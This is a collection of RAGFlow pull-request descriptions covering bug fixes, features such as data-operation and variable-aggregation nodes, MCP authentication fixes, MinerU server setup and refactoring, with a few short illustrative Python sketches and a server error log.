- [x] Testcase update
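The renaming behavior these tests expect could look roughly like the sketch below. `deduplicate_name` is a hypothetical helper, not the function introduced by PR #10960. The exact suffix format (no space before the parenthesis) and the counting beyond "(1)" are assumptions.

```python
def deduplicate_name(name: str, existing: set[str]) -> str:
    """Return `name` unchanged if it is free, otherwise append a numeric suffix.

    Assumption: the suffix is "(n)" with no leading space, and n keeps
    increasing until an unused name is found.
    """
    if name not in existing:
        return name
    counter = 1
    while f"{name}({counter})" in existing:
        counter += 1
    return f"{name}({counter})"


print(deduplicate_name("dataset", {"dataset"}))
```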
### What problem does this PR solve?
issue:
[#11195](https://github.com/infiniflow/ragflow/issues/11195)
change:
support API for generating knowledge graph and raptor
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
Add the specified parent_path to the document upload api interface
(#11230)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
Fix: Profile picture cropping supported
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
change:
“After each dialogue turn, the agent component’s output is not reset.”
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.21.1 to v0.22.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Bug fixes #10703
- Fixed the menu order in the user center
- Added a disabled RAPTOR scope
- Fixed some style issues
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
RAGFlow will no longer offer Docker images that contain embedding
models.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fixes: Fixed some bugs #10703
- Removed login page animation
- Modified some styles in the user profile center
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue that caused the page to crash when a knowledge base
variable was selected. #10427
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
GraphRAG and RAPTOR tasks do not affect document status.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
[Update LLM factory ranks in llm_factories.json]
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Confluence cannot retrieve updated files.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes: Fixed some bugs #10703
- Removed S3 upload from the file upload component
- Updated the dropdown menu style on the model provider page
- Updated some model provider icons
- Fixed other style issues
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Update env to support PPTX
Fix: update README for version changes #11138
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: The input parameters of data manipulation operators can only be of
type object. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add mechanism to check cancellation in Agent.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Place the new mcp button at the end of the line. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#10056
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes: Fixed model provider issues and improved some features
- Removed the old login page
- Updated model provider icons
- Added RAPTOR modification range parameter
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Call the interface to stop the output of the large model #10997
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add task executor bar chart
- Add read version string
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change:
1. update agent variable name rule.
2. reset() in Canvas doesn't reset the env var.
3. correct log input binding in message component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes: Bugs fixed
- Removed invalid code
- Modified the user center style
- Added an automatic data source parsing switch
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Added vendor ranking so that frequently used model providers appear
higher on the page for easier access.
Remove deprecated LLM configurations from llm_factories.json to
streamline model management
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of mcp and checkbox. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix infinity "INSERT: Column raptor_kwd not found in table" error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize Prompts and Regex for use_sql() #11127
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Globally defined conversation variables can be selected in the
operator's query variables. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
#11136
change:
not enough values to unpack (expected 3, got 2) in general chunk
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: remove unsupported models in siliconflow api
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: missing file formats in hierarchical_manager #11084
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The keys for data manipulation operators can only be numbers,
letters, and underscores. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
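The key rule described above (numbers, letters, and underscores only) can be expressed as a single pattern. This is a minimal sketch; `is_valid_key` is a hypothetical name, and restricting letters to ASCII and rejecting empty keys are assumptions.

```python
import re

# Assumption: "letters" means ASCII letters, and an empty key is invalid.
KEY_PATTERN = re.compile(r"[A-Za-z0-9_]+")


def is_valid_key(key: str) -> bool:
    """Return True if `key` consists only of letters, digits, and underscores."""
    return KEY_PATTERN.fullmatch(key) is not None


print(is_valid_key("user_id_1"), is_valid_key("user-id"))
```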
### What problem does this PR solve?
Feature: Added global variable functionality
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
For proper semantics, Layout should use the HTML `<main>` element to wrap the
Header and Outlet, which produce `<section>` HTML elements.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Modify and adjust styles (CSS vars, components) to match the design
system
- Adjust file and directory structure of admin UI
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add kimi-k2-thinking and moonshot-v1-vision-preview.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the selected variables in the variable aggregation node.
#10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The output is derived based on the configuration of the variable
aggregation operator. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Added some prompts and polling functionality to retrieve data
source logs.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The doc file cannot be parsed (#11092)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
Feat: Add a form for variable aggregation operators #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: OpenSearch retrieval no return #11006
Add documentation #11072
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Fix: Improve some functional issues with the data source. #10703
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
```
admin> show version;
show_version
+-----------------------+
| version |
+-----------------------+
| v0.21.0-241-gc6cf58d5 |
+-----------------------+
admin> \q
Goodbye!
```
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Currently we cannot add any models, since factory is a string, and the
return type of get_allowed_llm_factories() is List[object]
https://github.com/infiniflow/ragflow/pull/11003
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
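The type mismatch described above can be reproduced with a small sketch. The `Factory` class and its `name` attribute are hypothetical stand-ins for whatever objects `get_allowed_llm_factories()` returns. The point is only that a string never compares equal to such an object, so the membership check has to be done on names.

```python
from dataclasses import dataclass


@dataclass
class Factory:
    # Hypothetical stand-in for the objects in the returned list.
    name: str


def is_factory_allowed(factory: str, allowed: list[Factory]) -> bool:
    """Compare the factory string against the objects' names, not the objects."""
    return factory in {item.name for item in allowed}


allowed = [Factory("OpenAI"), Factory("Ollama")]
print("OpenAI" in allowed)                     # string vs. object: never matches
print(is_factory_allowed("OpenAI", allowed))   # compares names instead
```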
### What problem does this PR solve?
RAPTOR handles cancellation gracefully.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add variable aggregator node #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
GraphRAG handles cancellation gracefully. #10997
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: fix pdf_parser ignored in rag/app/naive.py #11000
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add variable assignment node #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The agent operator and message operator can only select string
variables as prompt words. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feature: Added data source functionality
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The value of data operations operators can be either input or
referenced from variables. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue of errors when using agents created from templates.
#10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: MCP cannot handle an empty Auth field properly, which results in:
```bash
2025-11-05 11:10:41,919 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:10:41,920 INFO 51209 client_session initialized successfully
2025-11-05 11:10:41,994 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:10:41] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:10:41,999 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:10:42,000 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:10:42,001 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:10:42] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:11:30,441 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:11:30,442 INFO 51209 client_session initialized successfully
2025-11-05 11:11:30,520 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:30] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:11:30,525 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:11:30,526 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:11:30,527 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:30] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:11:31,476 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:11:31,476 INFO 51209 client_session initialized successfully
2025-11-05 11:11:31,549 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:31] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:11:31,552 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:11:31,553 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:11:31,554 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:31] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:11:51,930 ERROR 51209 unhandled errors in a TaskGroup (1 sub-exception)
+ Exception Group Traceback (most recent call last):
| File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 86, in _mcp_server_loop
| async with streamablehttp_client(url, headers) as (read_stream, write_stream, _):
| File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/contextlib.py", line 217, in __aexit__
| await self.gen.athrow(typ, value, traceback)
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/mcp/client/streamable_http.py", line 478, in streamablehttp_client
| async with anyio.create_task_group() as tg:
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/anyio/_backends/_asyncio.py", line 781, in __aexit__
| raise BaseExceptionGroup(
| exceptiongroup.ExceptionGroup: unhandled errors in a TaskGroup (1 sub-exception)
+-+---------------- 1 ----------------
| Traceback (most recent call last):
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/mcp/client/streamable_http.py", line 409, in handle_request_async
| await self._handle_post_request(ctx)
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/mcp/client/streamable_http.py", line 278, in _handle_post_request
| response.raise_for_status()
| File "/home/xxxxxxxxx/workspace/ragflow/.venv/lib/python3.10/site-packages/httpx/_models.py", line 829, in raise_for_status
| raise HTTPStatusError(message, request=request, response=self)
| httpx.HTTPStatusError: Server error '502 Bad Gateway' for url 'http://192.168.1.38:9382/mcp'
| For more information check: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/502
+------------------------------------
2025-11-05 11:11:51,942 ERROR 51209 Error fetching tools from MCP server: streamable-http: http://192.168.1.38:9382/mcp
Traceback (most recent call last):
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 168, in get_tools
return future.result(timeout=timeout)
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 458, in result
return self.__get_result()
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
raise self._exception
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._get_tools_from_mcp_server) at 0x7d58f02e2c20>", line 40, in _get_tools_from_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 160, in _get_tools_from_mcp_server
result: ListToolsResult = await self._call_mcp_server("list_tools", timeout=timeout)
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._call_mcp_server) at 0x7d58f02e2b00>", line 63, in _call_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 139, in _call_mcp_server
raise result
ValueError: Connection failed (possibly due to auth error). Please check authentication settings first
2025-11-05 11:11:51,943 ERROR 51209 Test MCP error: Connection failed (possibly due to auth error). Please check authentication settings first
Traceback (most recent call last):
File "/home/xxxxxxxxx/workspace/ragflow/api/apps/mcp_server_app.py", line 429, in test_mcp
tools = tool_call_session.get_tools(timeout)
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession.get_tools) at 0x7d58f02e2cb0>", line 40, in get_tools
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 168, in get_tools
return future.result(timeout=timeout)
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 458, in result
return self.__get_result()
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
raise self._exception
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._get_tools_from_mcp_server) at 0x7d58f02e2c20>", line 40, in _get_tools_from_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 160, in _get_tools_from_mcp_server
result: ListToolsResult = await self._call_mcp_server("list_tools", timeout=timeout)
File "<@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._call_mcp_server) at 0x7d58f02e2b00>", line 63, in _call_mcp_server
File "/home/xxxxxxxxx/workspace/ragflow/rag/utils/mcp_tool_call_conn.py", line 139, in _call_mcp_server
raise result
ValueError: Connection failed (possibly due to auth error). Please check authentication settings first
2025-11-05 11:11:51,944 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:11:51,945 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:11:51,946 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:11:51] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:12:20,484 INFO 51209 Negotiated protocol version: 2025-06-18
2025-11-05 11:12:20,485 INFO 51209 client_session initialized successfully
2025-11-05 11:12:20,570 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:12:20] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:12:20,573 INFO 51209 Want to clean up 1 MCP sessions
2025-11-05 11:12:20,574 INFO 51209 1 MCP sessions has been cleaned up. 0 in global context.
2025-11-05 11:12:20,575 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:12:20] "POST /v1/mcp_server/test_mcp HTTP/1.1" 200 -
2025-11-05 11:15:02,119 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:15:02] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:16:24,967 INFO 51209 127.0.0.1 - - [05/Nov/2025 11:16:24] "GET /api/v1/datasets?page=1&page_size=1000&orderby=create_time&desc=True HTTP/1.1" 200 -
2025-11-05 11:30:24,284 ERROR 51209 Task was destroyed but it is pending!
task: <Task pending name='Task-58' coro=<MCPToolCallSession._mcp_server_loop() running at <@beartype(rag.utils.mcp_tool_call_conn.MCPToolCallSession._mcp_server_loop) at 0x7d58f02e29e0>:11> wait_for=<Future pending cb=[Task.task_wakeup()]> cb=[_chain_future.<locals>._call_set_state() at /home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/futures.py:392]>
2025-11-05 11:30:24,285 ERROR 51209 Task was destroyed but it is pending!
task: <Task pending name='Task-67' coro=<Queue.get() running at /home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/queues.py:159> wait_for=<Future pending cb=[Task.task_wakeup()]> cb=[_release_waiter(<Future pendi...ask_wakeup()]>)() at /home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/tasks.py:387]>
Exception ignored in: <coroutine object Queue.get at 0x7d585480ace0>
Traceback (most recent call last):
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/queues.py", line 161, in get
getter.cancel() # Just in case getter is not done yet.
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/base_events.py", line 753, in call_soon
self._check_closed()
File "/home/xxxxxxxxx/.local/share/uv/python/cpython-3.10.16-linux-x86_64-gnu/lib/python3.10/asyncio/base_events.py", line 515, in _check_closed
raise RuntimeError('Event loop is closed')
RuntimeError: Event loop is closed
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
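One way to guard against an empty Auth field is to drop blank header values before opening the connection. This is a sketch under that assumption, not the change made in this PR. `build_headers` is a hypothetical helper.

```python
def build_headers(raw_headers: dict[str, str]) -> dict[str, str]:
    """Return a copy of `raw_headers` without empty or whitespace-only values."""
    return {name: value for name, value in raw_headers.items() if value and value.strip()}


print(build_headers({"Authorization": "", "X-Request-Id": "abc"}))
```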
### What problem does this PR solve?
Feat: Submit clean data operations form data to the backend. #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The Markdown table extractor now supports HTML `<table ...>` tags. #10966
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
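Matching a `<table>` opening tag that carries attributes can be sketched with a regular expression such as the one below. This is an illustration, not the extractor's actual pattern. `extract_html_tables` is a hypothetical name, and nested tables are not handled.

```python
import re

# `\b[^>]*` lets the opening tag carry attributes, e.g. <table class="x">.
TABLE_RE = re.compile(r"<table\b[^>]*>.*?</table>", re.IGNORECASE | re.DOTALL)


def extract_html_tables(markdown: str) -> list[str]:
    """Return every non-nested <table ...>...</table> block found in the text."""
    return TABLE_RE.findall(markdown)


text = 'intro\n<table class="x"><tr><td>1</td></tr></table>\nend <table><tr></tr></table>'
print(len(extract_html_tables(text)))
```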
### What problem does this PR solve?
Feat: Support more chunking methods #10772
This PR enables multiple chunking methods — including books, laws,
naive, one, and presentation — to be used with all existing PDF parsers
(DeepDOC, MinerU, Docling, TCADP, Plain Text, and Vision modes).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Fix selected radio button text misaligned with radio button dot
- Fix `<ScrollArea>` scrollbar z-index issue
- Add backdrop blur effect on scrollbar thumbs
- Adjust some styles to match the design
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1. Move EMBEDDING_CFG to common.globals
2. Fix incorrect imports
3. Move signal handlers to common/signal_utils.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
New component: Data Operations
#10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, if we want to restrict the factories that users can use, we
need to delete rows from the database table manually. This PR introduces
a variable that, if set, restricts the LLM factories that users can see
and add. This allows us to leave llm_factories.json and the database
untouched if the LLM factory is already inserted.
Note: All the lint changes came from the pre-commit hook, which I did not
change.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
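The restriction described above can be sketched as a filter driven by an optional setting. The variable name `ALLOWED_LLM_FACTORIES` and its comma-separated format are assumptions made for illustration. The description does not state how the variable is named or parsed.

```python
import os
from typing import Optional


def filter_factories(all_factories: list[str], setting: Optional[str]) -> list[str]:
    """Return only the factories named in `setting`; return all if it is unset."""
    if not setting:
        return list(all_factories)
    allowed = {name.strip() for name in setting.split(",") if name.strip()}
    return [name for name in all_factories if name in allowed]


# Hypothetical variable name; unset means "no restriction".
setting = os.environ.get("ALLOWED_LLM_FACTORIES")
print(filter_factories(["OpenAI", "Ollama", "Tongyi-Qianwen"], setting))
```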
### What problem does this PR solve?
Feat: Add a form with data operations operators #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refine Confluence connector.
#10953
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
### What problem does this PR solve?
Add support for MinerU http-client/server method.
To use MinerU with vLLM server:
1. Set up a vLLM server running MinerU:
```bash
mineru-vllm-server --port 30000
```
2. Configure the following environment variables:
- `MINERU_EXECUTABLE=/ragflow/uv_tools/.venv/bin/mineru` (or the path to
your MinerU executable)
- `MINERU_BACKEND="vlm-http-client"`
- `MINERU_SERVER_URL="http://your-vllm-server-ip:30000"`
3. Follow the standard MinerU setup steps as described above.
With this configuration, RAGFlow will connect to your vLLM server to
perform document parsing, which can significantly improve parsing
performance for complex documents while reducing the resource
requirements on your RAGFlow server.


### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
1. Update RetCode to common.constants
2. Decouple the admin and API modules
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
1. Rename identifiers
2. Fix some return statements
3. Fix some typos
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Add data operation node #10427
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Dataset creation performance differs between the HTTP API and the web UI
#10925
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
change:
wrong param in meta_data_filter
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Fix MCP test connection authentication issues by updating frontend
request format
- Add variables field with authorization_token for template substitution
- Change headers to use proper Authorization Bearer format with template
variable
### What problem does this PR solve?
correct MCP server authentication header format in frontend
### Type of change
* [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Marvion <marvionliu@wukongjx.cn>
Co-authored-by: Claude <noreply@anthropic.com>
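The header format described above (an `Authorization: Bearer` value filled in from a `variables` field) might be rendered as in the sketch below. The `${authorization_token}` placeholder syntax, the payload shape, and `render_headers` are assumptions for illustration. The actual template syntax used by the frontend and backend is not shown in this description.

```python
from string import Template


def render_headers(headers: dict[str, str], variables: dict[str, str]) -> dict[str, str]:
    """Substitute `${name}` placeholders in header values; unknown names are left as-is."""
    return {name: Template(value).safe_substitute(variables) for name, value in headers.items()}


# Hypothetical request payload shape.
payload = {
    "headers": {"Authorization": "Bearer ${authorization_token}"},
    "variables": {"authorization_token": "example-token"},
}
print(render_headers(payload["headers"], payload["variables"]))
```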
### What problem does this PR solve?
Feat: Add variables to the metadata filtering function of the knowledge
retrieval component. #10861
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed an issue where dragged operators within an iteration were
not associated with the iteration. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…e retrieval component.
### What problem does this PR solve?
issue:
#10861
change:
add variables to the metadata filtering function of the knowledge
retrieval component
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#10890](https://github.com/infiniflow/ragflow/issues/10890)
change:
missing embedding vector on Tokenizer
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
change:
wrong describe_with_prompt() in ollama
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Filter structured output data directly during the rendering stage.
#10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: UnicodeDecodeError: 'gb2312' codec can't decode byte 0xab in
position 560: illegal multibyte sequence.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
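A common way to avoid this kind of `UnicodeDecodeError` is to try a short list of encodings and fall back to a lossy decode. The sketch below is not the fix applied in this PR. `decode_with_fallback` and the chosen encoding order are assumptions. `gb18030` is used because it is a superset of `gb2312`.

```python
def decode_with_fallback(data: bytes, encodings: tuple[str, ...] = ("utf-8", "gb18030")) -> str:
    """Try each encoding in order; replace undecodable bytes as a last resort."""
    for encoding in encodings:
        try:
            return data.decode(encoding)
        except UnicodeDecodeError:
            continue
    return data.decode("utf-8", errors="replace")


print(decode_with_fallback("中文".encode("gb2312")))
```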
### What problem does this PR solve?
Feat: The structured output of the variable query can also be clicked.
#10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add whitelist management and role management in Admin UI
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The query variable of a loop operator can be a nested array
variable. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: parsing hyperlinks in docx and pdf #10848
Fix: default parser config of toc extraction
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add get_uuid, download_img and hash_str2int into misc_utils.py
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: The nodes on the canvas were not updated in time after the operator
name was modified. #10866
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the styling and logic issues on the model provider page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Rename the files in the jsonjoy-builder directory to lowercase.
#10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refactor(setting-model): Refactor the model management interface and
optimize the component structure. #10703
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Modify the style of the query variable dropdown list. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add '|| true' to docker rmi command to prevent workflow failure when
image removal fails. This ensures the CI pipeline continues even if the
Docker image cannot be removed for any reason.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Fix the login card overlapping the title on the admin login page
- Disable the unnecessary `listRoles()` query on the user management page
and in the create user form
- Disable the retry mechanism for admin UI API queries and mutations
- Fix the page not redirecting to the login page automatically when the
API reports unauthorized (401)
- Fix the change password form not resetting when the change password
modal closes
- Resolve an issue where admin UI content (mostly long texts) may break
the layout of the main box
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The query variables of the subsequent operators can reference the
structured variables defined in the agent operator. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the input length exceeds the context length #10750
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The video parser should follow the selected VLM rather than the default one.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#10890](https://github.com/infiniflow/ragflow/issues/10890)
change:
enhance delimiters in markdown parser
### Type of change
